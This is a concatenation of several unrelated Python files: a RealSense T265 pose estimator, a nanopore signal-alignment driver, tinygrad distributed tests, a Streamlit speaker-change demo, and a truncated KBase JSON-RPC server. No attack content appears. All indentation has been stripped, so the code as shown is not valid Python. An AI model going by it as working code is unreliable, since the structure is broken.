config = rs.config()
config.enable_stream(rs.stream.pose)
device = config.resolve(self.pipe).get_device()
pose_sensor = device.first_pose_sensor()
pose_sensor.set_notifications_callback(self._realsense_notification_callback)
self.enable_pose_stream = True
self.pipe.start(config)
def _process_frames(self):
self.frames = self.pipe.wait_for_frames()
pose = self.frames.get_pose_frame()
if pose:
# Pose data consists of translation and rotation
data = pose.get_pose_data()
# Confidence level value from T265: 0-3, remapped to 0 - 100: 0% - Failed / 33.3% - Low / 66.6% - Medium / 100% - High
self.current_confidence_level = float(data.tracker_confidence * 100 / 3)
# In transformations, Quaternions w+ix+jy+kz are represented as [w, x, y, z]!
H_T265Ref_T265body = tf.quaternion_matrix([data.rotation.w, data.rotation.x, data.rotation.y, data.rotation.z])
H_T265Ref_T265body[0][3] = data.translation.x * self.scale_factor
H_T265Ref_T265body[1][3] = data.translation.y * self.scale_factor
H_T265Ref_T265body[2][3] = data.translation.z * self.scale_factor
# Transform to aeronautic coordinates (body AND reference frame!)
self.H_aeroRef_aeroBody = self.H_aeroRef_T265Ref.dot(H_T265Ref_T265body.dot(self.H_T265body_aeroBody))
# vision_speed_estimate_message
# Calculate GLOBAL XYZ speed (speed from T265 is already GLOBAL)
# V_aeroRef_aeroBody = tf.quaternion_matrix([1,0,0,0])
# V_aeroRef_aeroBody[0][3] = data.velocity.x
# V_aeroRef_aeroBody[1][3] = data.velocity.y
# V_aeroRef_aeroBody[2][3] = data.velocity.z
# V_aeroRef_aeroBody = H_aeroRef_T265Ref.dot(V_aeroRef_aeroBody)
# Check for pose jump and increment reset_counter
if self.prev_data is not None:
delta_translation = [data.translation.x - self.prev_data.translation.x, data.translation.y - self.prev_data.translation.y, data.translation.z - self.prev_data.translation.z]
delta_velocity = [data.velocity.x - self.prev_data.velocity.x, data.velocity.y - self.prev_data.velocity.y, data.velocity.z - self.prev_data.velocity.z]
position_displacement = np.linalg.norm(delta_translation)
speed_delta = np.linalg.norm(delta_velocity)
if (position_displacement > self.jump_threshold) or (speed_delta > self.jump_speed_threshold):
if position_displacement > self.jump_threshold:
self.logger.log_warn("Position jumped by: %s" % position_displacement)
elif speed_delta > self.jump_speed_threshold:
self.logger.log_warn("Speed jumped by: %s" % speed_delta)
self._increment_reset_counter()
self.prev_data = data
# Take offsets from body's center of gravity (or IMU) to camera's origin into account
# if self.body_offset_enabled == 1:
# H_body_camera = tf.euler_matrix(0, 0, 0, 'sxyz')
# H_body_camera[0][3] = body_offset_x
# H_body_camera[1][3] = body_offset_y
# H_body_camera[2][3] = body_offset_z
# H_camera_body = np.linalg.inv(H_body_camera)
# H_aeroRef_aeroBody = H_body_camera.dot(H_aeroRef_aeroBody.dot(H_camera_body))
# Realign heading to face north using initial compass data
if self.compass_enabled:
self.H_aeroRef_aeroBody = self.H_aeroRef_aeroBody.dot( tf.euler_matrix(0, 0, self.heading_north_yaw, 'sxyz'))
self._compute_pose_estimate(data)
def _increment_reset_counter(self):
if self.reset_counter >= 255:
self.reset_counter = 1
self.reset_counter += 1
def _compute_pose_estimate(self, data):
if self.H_aeroRef_aeroBody is not None:
current_time_us = int(round(time.time() * 1000000))
# Setup angle data
rpy_rad = np.array( tf.euler_from_matrix(self.H_aeroRef_aeroBody, 'sxyz'))
# Setup covariance data, which is the upper right triangle of the covariance matrix, see here: https://files.gitter.im/ArduPilot/VisionProjects/1DpU/image.png
# Attemp #01: following this formula https://github.com/IntelRealSense/realsense-ros/blob/development/realsense2_camera/src/base_realsense_node.cpp#L1406-L1411
cov_pose = self.cfg.t265['linear_accel_cov'] * pow(10, 3 - int(data.tracker_confidence))
cov_twist = self.cfg.t265['angular_vel_cov'] * pow(10, 1 - int(data.tracker_confidence))
covariance = [cov_pose, 0, 0, 0, 0, 0,
cov_pose, 0, 0, 0, 0,
cov_pose, 0, 0, 0,
cov_twist, 0, 0,
cov_twist, 0,
cov_twist]
self.pose_estimate_data = [
current_time_us,
self.H_aeroRef_aeroBody[0][3], # Local X position
self.H_aeroRef_aeroBody[1][3], # Local Y position
self.H_aeroRef_aeroBody[2][3], # Local Z position
rpy_rad[0], # Roll angle
rpy_rad[1], # Pitch angle
rpy_rad[2], # Yaw angle
covariance, # Row-major representation of pose 6x6 cross-covariance matrix
self.reset_counter # Estimate reset counter. Increment every time pose estimate jumps.
]
self.logger.log_debug("Captured pose estimate data: %s" % str(self.pose_estimate_data))
|
runSignalAlign.py
|
#!/usr/bin/env python
"""Main driver script for running an ionic current-to-sequence alignment on a single machine.
"""
from __future__ import print_function
import sys
import os
#import pysam
from argparse import ArgumentParser
from random import shuffle
from multiprocessing import Process, current_process, Manager
from signalalign.signalAlignment import SignalAlignment
from signalalign.utils import processReferenceFasta, parseFofn
from signalalign.utils.fileHandlers import FolderHandler
from signalalign.utils.bwaWrapper import getBwaIndex
from signalalign.motif import getDegenerateEnum
def signalAlignSourceDir():
return "/".join(os.path.abspath(__file__).split("/")[:-1]) # returns path without runSignalAlign
def resolvePath(p):
if p is None:
return None
elif p.startswith("/"):
return p
else:
return os.path.abspath(p)
def parse_args():
parser = ArgumentParser(description=__doc__)
# required arguments
parser.add_argument('--file_directory', '-d', action='store',
dest='files_dir', required=True, type=str, default=None,
help="directory with MinION fast5 reads to align")
parser.add_argument('--ref', '-r', action='store',
dest='ref', required=True, type=str,
help="reference sequence to align to, in FASTA")
parser.add_argument('--output_location', '-o', action='store', dest='out',
required=True, type=str, default=None,
help="directory to put the alignments")
# optional arguments
parser.add_argument("--2d", action='store_true', dest="twoD", default=False, help="flag, specify if using 2D reads")
parser.add_argument("--bwt", action='store', dest="bwt", default=None, help="path to BWT files. example: ../ref.fasta")
parser.add_argument('--in_template_hmm', '-T', action='store', dest='in_T_Hmm',
required=False, type=str, default=None,
help="input HMM for template events, if you don't want the default")
parser.add_argument('--in_complement_hmm', '-C', action='store', dest='in_C_Hmm',
required=False, type=str, default=None,
help="input HMM for complement events, if you don't want the default")
parser.add_argument('--template_hdp', '-tH', action='store', dest='templateHDP', default=None,
help="template serialized HDP file")
parser.add_argument('--complement_hdp', '-cH', action='store', dest='complementHDP', default=None,
help="complement serialized HDP file")
parser.add_argument('--degenerate', '-x', action='store', dest='degenerate', default="variant",
help="Specify degenerate nucleotide options: "
"variant -> {ACGT}, cytosine2 -> {CE} cytosine3 -> {CEO} adenosine -> {AI}")
parser.add_argument('--stateMachineType', '-smt', action='store', dest='stateMachineType', type=str,
default="threeState", help="decide which model to use, threeState by default")
parser.add_argument('--file_of_files', '-fofn', action='store', dest='fofn', required=False, type=str, default=None,
help="text file containing absolute paths to files to use")
parser.add_argument('--threshold', '-t', action='store', dest='threshold', type=float, required=False,
default=0.01, help="posterior match probability threshold, Default: 0.01")
parser.add_argument('--diagonalExpansion', '-e', action='store', dest='diag_expansion', type=int,
required=False, default=None,
help="number of diagonals to expand around each anchor default: 50")
parser.add_argument('--constraintTrim', '-m', action='store', dest='constraint_trim', type=int,
required=False, default=None, help='amount to remove from an anchor constraint')
parser.add_argument('--target_regions', '-q', action='store', dest='target_regions', type=str,
required=False, default=None, help="tab separated table with regions to align to")
parser.add_argument("--motif", action="store", dest="motif_key", default=None)
parser.add_argument('--ambiguity_positions', '-p', action='store', required=False, default=None,
dest='ambiguity_positions', help="Ambiguity positions")
parser.add_argument('--jobs', '-j', action='store', dest='nb_jobs', required=False,
default=4, type=int, help="number of jobs to run in parallel")
parser.add_argument('--nb_files', '-n', action='store', dest='nb_files', required=False,
default=500, type=int, help="maximum number of reads to align")
parser.add_argument('--ambig_char', '-X', action='store', required=False, default=None, type=str, dest='ambig_char',
help="")
parser.add_argument('--output_format', '-f', action='store', default="full", dest='outFmt',
help="output format: full, variantCaller, or assignments. Default: full")
parser.add_argument('--debug', action='store_true', dest="DEBUG", default=False)
args = parser.parse_args()
return args
def aligner(work_queue, done_queue):
try:
for f in iter(work_queue.get, 'STOP'):
alignment = SignalAlignment(**f)
alignment.run()
except Exception, e:
done_queue.put("%s failed with %s" % (current_process().name, e.message))
def concat_variant_call_files(path):
concat_command = "cat {path}/*.tsv > {path}/probs.tsv".format(path=path)
os.system(concat_command)
return
def main(args):
# parse args
args = parse_args()
command_line = " ".join(sys.argv[:])
print("Command Line: {cmdLine}\n".format(cmdLine=command_line), file=sys.stderr)
# get absolute paths to inputs
args.files_dir = resolvePath(args.files_dir)
args.ref = resolvePath(args.ref)
args.out = resolvePath(args.out)
args.bwt = resolvePath(args.bwt)
args.in_T_Hmm = resolvePath(args.in_T_Hmm)
args.in_C_Hmm = resolvePath(args.in_C_Hmm)
args.templateHDP = resolvePath(args.templateHDP)
args.complementHDP = resolvePath(args.complementHDP)
args.fofn = resolvePath(args.fofn)
args.target_regions = resolvePath(args.target_regions)
args.ambiguity_positions = resolvePath(args.ambiguity_positions)
start_message = """
# Starting Signal Align
# Aligning files from: {fileDir}
# Aligning to reference: {reference}
# Aligning maximum of {nbFiles} files
# Using model: {model}
# Using banding: True
# Aligning to regions in: {regions}
# Non-default template HMM: {inThmm}
# Non-default complement HMM: {inChmm}
# Template HDP: {tHdp}
# Complement HDP: {cHdp}
""".format(fileDir=args.files_dir, reference=args.ref, nbFiles=args.nb_files,
inThmm=args.in_T_Hmm, inChmm=args.in_C_Hmm, model=args.stateMachineType, regions=args.target_regions,
tHdp=args.templateHDP, cHdp=args.complementHDP)
print(start_message, file=sys.stdout)
if args.files_dir is None and args.fofn is None:
print("Need to provide directory with .fast5 files of fofn", file=sys.stderr)
sys.exit(1)
if not os.path.isfile(args.ref):
print("Did not find valid reference file, looked for it {here}".format(here=args.ref), file=sys.stderr)
sys.exit(1)
# make directory to put temporary files
temp_folder = FolderHandler()
temp_dir_path = temp_folder.open_folder(args.out + "/tempFiles_alignment")
reference_map = processReferenceFasta(fasta=args.ref,
motif_key=args.motif_key,
work_folder=temp_folder,
sub_char=args.ambig_char,
positions_file=args.ambiguity_positions)
# index the reference for bwa
if args.bwt is not None:
print("[RunSignalAlign]NOTICE - using provided BWT %s" % args.bwt)
bwa_ref_index = args.bwt
else:
print("signalAlign - indexing reference", file=sys.stderr)
bwa_ref_index = getBwaIndex(args.ref, temp_dir_path)
print("signalAlign - indexing reference, done", file=sys.stderr)
# setup workers for multiprocessing
workers = args.nb_jobs
work_queue = Manager().Queue()
done_queue = Manager().Queue()
jobs = []
# list of read files
if args.fofn is not None:
fast5s = [x for x in parseFofn(args.fofn) if x.endswith(".fast5")]
else:
fast5s = ["/".join([args.files_dir, x]) for x in os.listdir(args.files_dir) if x.endswith(".fast5")]
nb_files = args.nb_files
if nb_files < len(fast5s):
shuffle(fast5s)
fast5s = fast5s[:nb_files]
# change paths to the source directory
os.chdir(signalAlignSourceDir())
print("[runSignalAlign]:NOTICE: Got {} files to align".format(len(fast5s)), file=sys.stdout)
for fast5 in fast5s:
print(fast5)
alignment_args = {
"reference_map": reference_map,
"destination": temp_dir_path,
"stateMachineType": args.stateMachineType,
"bwa_index": bwa_ref_index,
"in_templateHmm": args.in_T_Hmm,
"in_complementHmm": args.in_C_Hmm,
"in_templateHdp": args.templateHDP,
"in_complementHdp": args.complementHDP,
"output_format": args.outFmt,
"in_fast5": fast5,
"threshold": args.threshold,
"diagonal_expansion": args.diag_expansion,
"constraint_trim": args.constraint_trim,
"degenerate": getDegenerateEnum(args.degenerate),
"twoD_chemistry": args.twoD,
"target_regions": args.target_regions,
}
if args.DEBUG:
alignment = SignalAlignment(**alignment_args)
alignment.run()
else:
work_queue.put(alignment_args)
for w in xrange(workers):
p = Process(target=aligner, args=(work_queue, done_queue))
p.start()
jobs.append(p)
work_queue.put('STOP')
for p in jobs:
p.join()
done_queue.put('STOP')
print("\n# signalAlign - finished alignments\n", file=sys.stderr)
print("\n# signalAlign - finished alignments\n", file=sys.stdout)
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
node_test.py
|
from multiprocessing import Process
import unittest
import numpy as np
import time
import torch
from tinygrad.tensor import Tensor
from node import NodeManager, Worker
U_init = np.random.randn(3,3).astype(np.float32)
V_init = np.random.randn(3,3).astype(np.float32)
W_init = np.random.randn(3,3).astype(np.float32)
def run_remote(func, port):
worker = Worker(func, port)
worker.run()
class TestDist(unittest.TestCase):
def test_broadcast(self):
man = NodeManager()
node = man.add_node("localhost:8080")
u = Tensor(U_init)
forward = lambda u: u
procs = [
Process(target=run_remote, args=[forward, 8080]),
]
[proc.start() for proc in procs]
time.sleep(1)
x = man.broadcast(u, node)
y = man.reduce(x)
np.testing.assert_allclose(u.data, y.data, atol=1e-5)
man.terminate(node)
[proc.join() for proc in procs]
# TODO add backward test
def test_reduce_forward(self):
man = NodeManager()
node1 = man.add_node("localhost:8080")
node2 = man.add_node("localhost:8081")
def test_tinygrad():
u = Tensor(U_init)
v = Tensor(V_init)
w = Tensor(W_init)
forward1 = lambda u: u.mul(v).relu()
forward2 = lambda u: u.mul(w).relu()
procs = [
Process(target=run_remote, args=[forward1, 8080]),
Process(target=run_remote, args=[forward2, 8081]),
]
[proc.start() for proc in procs]
x, y = man.broadcast(u, node1, node2)
out = man.reduce(x, y).relu()
out = out.logsoftmax()
out = out.sum()
[man.terminate(node) for node in [node1, node2]]
[proc.join() for proc in procs]
return out.cpu().data#, u.cpu().grad.data, v.cpu().grad.data, w.cpu().grad.data
def test_pytorch():
u = torch.tensor(U_init, requires_grad=True)
v = torch.tensor(V_init, requires_grad=True)
w = torch.tensor(W_init, requires_grad=True)
x = u.mul(v).relu()
y = u.mul(w).relu()
out = x.add(y).relu()
out = torch.nn.functional.log_softmax(out, dim=1)
out = out.sum()
return out.detach().numpy()#, u.grad, v.grad, w.grad
x, y = test_tinygrad(), test_pytorch()
np.testing.assert_allclose(x, y, atol=1e-5)
if __name__ == "__main__":
unittest.main()
|
main.py
|
import os
import streamlit.components.v1 as components
import streamlit as st
import time
import numpy as np
import IPython.display as ipd
#ipd.Audio(audio, rate=16000)
from online_scd.model import SCDModel
from online_scd.streaming import StreamingDecoder
import timeit
import base64
import scipy.io.wavfile
from online_scd.utils import load_wav_file
import multiprocessing
#import playsound
import queue
import time
from typing import List
import numpy as np
import pydub
from pydub.playback import play
import streamlit as st
from streamlit_webrtc import (
ClientSettings,
WebRtcMode,
webrtc_streamer,
)
from pathlib import Path
import os, time, sys
# Create a _RELEASE constant. We'll set this to False while we're developing
# the component, and True when we're ready to package and distribute it.
# (This is, of course, optional - there are innumerable ways to manage your
# release process.)
_RELEASE = False
upload_counter = 0
# Declare a Streamlit component. `declare_component` returns a function
# that is used to create instances of the component. We're naming this
# function "_component_func", with an underscore prefix, because we don't want
# to expose it directly to users. Instead, we will create a custom wrapper
# function, below, that will serve as our component's public API.
# It's worth noting that this call to `declare_component` is the
# *only thing* you need to do to create the binding between Streamlit and
# your component frontend. Everything else we do in this file is simply a
# best practice.
if not _RELEASE:
_component_func = components.declare_component(
# We give the component a simple, descriptive name ("my_component"
# does not fit this bill, so please choose something better for your
# own component :)
"my_component",
# Pass `url` here to tell Streamlit that the component will be served
# by the local dev server that you run via `npm run start`.
# (This is useful while your component is in development.)
url="http://localhost:3001",
)
model = SCDModel.load_from_checkpoint("template/my_component/test/sample_model/checkpoints/epoch=102.ckpt")
#file_path = "template/my_component/frontend/src/audio"
file_name = "template/my_component/frontend/src/audio/3321821.wav"
build_dir = "template/my_component/frontend/src"
else:
# When we're distributing a production version of the component, we'll
# replace the `url` param with `path`, and point it to to the component's
# build directory:
parent_dir = os.path.dirname(os.path.abspath(__file__))
build_dir = os.path.join(parent_dir, "frontend/build")
_component_func = components.declare_component("my_component", path=build_dir)
model = SCDModel.load_from_checkpoint("template/my_component/test/sample_model/checkpoints/epoch=102.ckpt")
#file_path = "template/my_component/frontend/src/audio"
file_name = "template/my_component/frontend/src/audio/3321821.wav"
# Create a wrapper function for the component. This is an optional
# best practice - we could simply expose the component function returned by
# `declare_component` and call it done. The wrapper allows us to customize
# our component's API: we can pre-process its input args, post-process its
# output value, and add a docstring for users.
def my_component(name, audio, key=None):
"""Create a new instance of "my_component".
Parameters
----------
name: str
The name of the thing we're saying hello to. The component will display
the text "Hello, {name}!"
key: str or None
An optional key that uniquely identifies this component. If this is
None, and the component's arguments are changed, the component will
be re-mounted in the Streamlit frontend and lose its current state.
Returns
-------
int
The number of times the component's "Click Me" button has been clicked.
(This is the value passed to `Streamlit.setComponentValue` on the
frontend.)
"""
# Call through to our private component function. Arguments we pass here
# will be sent to the frontend, where they'll be available in an "args"
# dictionary.
#
# "default" is a special argument that specifies the initial return
# value of the component before the user has interacted with it.
component_value = _component_func(name=name, audio=audio, key=key, default=0)
# We could modify the value returned from the component if we wanted.
# There's no need to do this in our simple example - but it's an option.
return component_value
# Add some test code to play with the component while it's in development.
# During development, we can run this just as we would any other Streamlit
# app: `$ streamlit run my_component/__init__.py`
def stream_sample():
st.subheader("Streaming a sample .wav")
# Create a second instance of our component whose `name` arg will vary
# based on a text_input widget.
#
# We use the special "key" argument to assign a fixed identity to this
# component instance. By default, when a component's arguments change,
# it is considered a new instance and will be re-mounted on the frontend
# and lose its current state. In this case, we want to vary the component's
# "name" argument without having it get recreated.
sound = pydub.AudioSegment.from_wav(file_name)
sound = sound.set_channels(1).set_frame_rate(16000)
audio = np.array(sound.get_array_of_samples())/32768
#enc=base64.b64encode(open(file_name, "rb").read())
last_rows = np.zeros((1,1))
chart = st.line_chart(last_rows)
frame_number = 0
#p = multiprocessing.Process(target=playsound.playsound, args=(file_name,))
#play_obj = wave_obj.play()
start_0 = timeit.default_timer()
was_clicked = my_component(name="test", audio = "sample", key="foo")
if was_clicked:
for i in range(0, len(audio), 1000):
# while (num_clicks%2 == 0):
# time.sleep(0.1)
start = timeit.default_timer()
for probs in st.session_state.model.process_audio(audio[i: i+1000]):
new_rows = np.zeros((1, 1))
new_rows[0,0] = probs[1].detach().numpy()
chart.add_rows(new_rows)
frame_number += 1
end = timeit.default_timer()
# text_output.markdown(f"{end-start_0} seconds")
time.sleep(max(0,1/16-end+start))
# st.button("Re-run")
def stream_mic():
st.subheader("Streaming from microphone")
webrtc_ctx = webrtc_streamer(
key="speech-to-text",
mode=WebRtcMode.SENDONLY,
audio_receiver_size=1024,
client_settings=ClientSettings(
rtc_configuration={
"iceServers": [{"urls": ["stun:stun.l.google.com:19302"]}]
},
media_stream_constraints={"video": False, "audio": True},
),
)
status_indicator = st.empty()
if not webrtc_ctx.state.playing:
return
status_indicator.write("Loading...")
text_output = st.empty()
stream = None
last_rows = np.zeros((1,1))
chart = st.line_chart(last_rows)
streaming_decoder = StreamingDecoder(model)
frame_number = 0
status_indicator.write("Model loaded.")
ct=0
while True:
if webrtc_ctx.audio_receiver:
sound_chunk = pydub.AudioSegment.empty()
try:
audio_frames = webrtc_ctx.audio_receiver.get_frames(timeout=1)
except queue.Empty:
time.sleep(0.1)
status_indicator.write("No frame arrived.")
continue
status_indicator.write("Running. Say something!")
for audio_frame in audio_frames:
sound = pydub.AudioSegment(
data=audio_frame.to_ndarray().tobytes(),
sample_width=audio_frame.format.bytes,
frame_rate=audio_frame.sample_rate,
channels=len(audio_frame.layout.channels),
)
sound_chunk += sound
if len(sound_chunk) > 0:
sound_chunk = sound_chunk.set_channels(1).set_frame_rate(
16000
)
buffer = np.array(sound_chunk.get_array_of_samples())
text_output.markdown(f"{ct/16000} seconds")
buffer = np.array(buffer)/32768
ct+=len(buffer)
#text_output.markdown(f"burh{ct}")
for i in range(0, len(buffer), 1000):
for probs in st.session_state.model.process_audio(buffer[i: i+1000]):
new_rows = np.zeros((1, 1))
new_rows[0,0] = probs[1].detach().numpy()
chart.add_rows(new_rows)
frame_number += 1
else:
status_indicator.write("AudioReciver is not set. Abort.")
break
file_changed = False
def upload_file():
global file_changed
file_changed = True
if 'upload' not in st.session_state:
st.session_state['upload'] = 'value'
if 'model' not in st.session_state:
st.session_state['model'] = StreamingDecoder(model)
def stream_upload():
#global upload_counter
st.subheader("Streaming an upload")
# Create a second instance of our component whose `name` arg will vary
# based on a text_input widget.
#
# We use the special "key" argument to assign a fixed identity to this
# component instance. By default, when a component's arguments change,
# it is considered a new instance and will be re-mounted on the frontend
# and lose its current state. In this case, we want to vary the component's
# "name" argument without having it get recreated.
# name_input = st.text_input("Enter a name", value="Streamlit")
uploaded_file = st.file_uploader("Choose a file", on_change=upload_file())
#if uploaded_file is not None
#was_clicked = my_component(name="test",audio = file_name, key="foo")
if uploaded_file is not None:
if (uploaded_file.name != st.session_state['upload']):
st.session_state['upload'] = uploaded_file.name
#upload_counter+=1
path = build_dir + "/audio"
current_uploads = []
for f in os.listdir(path):
current_uploads.append(f.split(".")[0])
i = 0
while True:
if str(i) not in current_uploads:
new_name = str(i)
break
i+=1
sound = pydub.AudioSegment.from_wav(uploaded_file)
sound = sound.set_channels(1).set_frame_rate(16000)
#only consider first minute of the file for uploads
sound = sound[:60*1000]
audio = np.array(sound.get_array_of_samples())/32768
file_name = new_name + ".wav"
save_location = build_dir +"/audio/"+ file_name
sound = (sound[:2000]-1000) + sound
sound.export(save_location, format="wav")
st.session_state['file_name'] = file_name
st.session_state['audio'] = audio
#p = multiprocessing.Process(target=playsound.playsound, args=(file_name,))
#play_obj = wave_obj.play()
file_name = st.session_state['file_name']
start_0 = timeit.default_timer()
was_clicked = my_component(name="test2",audio = file_name)
if was_clicked:
#streaming_decoder = StreamingDecoder(model)
frame_number = 0
last_rows = np.zeros((1,1))
chart = st.line_chart(last_rows)
#audio = st.session_state['audio']
for i in range(0, len(st.session_state.audio), 1000):
# while (num_clicks%2 == 0):
# time.sleep(0.1)
start = timeit.default_timer()
for probs in st.session_state.model.process_audio(st.session_state.audio[i: i+1000]):
new_rows = np.zeros((1, 1))
new_rows[0,0] = probs[1].detach().numpy()
chart.add_rows(new_rows)
frame_number += 1
end = timeit.default_timer()
# text_output.markdown(f"{end-start_0} seconds")
time.sleep(max(0,1/16-end+start))
# st.button("Re-run")
#os.remove(save_location)
def main():
st.header("Demo of Collar-Aware Training for Speaker Change Detection")
st.markdown("The model uses a multi-layer LSTM on top of pre-trained speech embeddings, and a final softmax layer. The model uses a step size of 100 ms (i.e., it outputs 10 decisions per second). The model is implemented in Pytorch while this demo was built using Streamlit.")
st.markdown("The model is trained using a special version of cross-entropy training which tolerates small errors in the hypothesized speaker change timestamps. Due to this, the softmax outputs of the trained model are very peaky and do not require any local maxima tracking for extracting the final speaker turn points. This makes the model suitable for online appications.")
st.markdown("This demo visualizes the output of the model for an audio source. The audio source can be either a sample file, a microphone or an uploaded file, first 60 seconds of which is used.")
option_1 = 'A sample file'
option_2 = 'A microphone'
option_3 = 'An uploaded .wav file'
option = st.selectbox(
'Which audio source would you like to use?',
(option_1,option_2,option_3), 0)
if option == option_1:
#file_name = "3321821.wav"
stream_sample()
elif option == option_2:
stream_mic()
elif option == option_3:
stream_upload()
path = build_dir + "/audio"
now = time.time()
for f in os.listdir(path):
if f!="3321821.wav" and f[-3:] == "wav":
f = os.path.join(path, f)
if os.stat(f).st_mtime < now - 3600:
if os.path.isfile(f):
os.remove(f)
if __name__ == "__main__":
main()
|
Report_util_landmlServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from Report_util_landml.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'Report_util_landml'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from Report_util_landml.Report_util_landmlImpl import Report_util_landml # noqa @IgnorePep8
impl_Report_util_landml = Report_util_landml(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'Report_util_landml'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
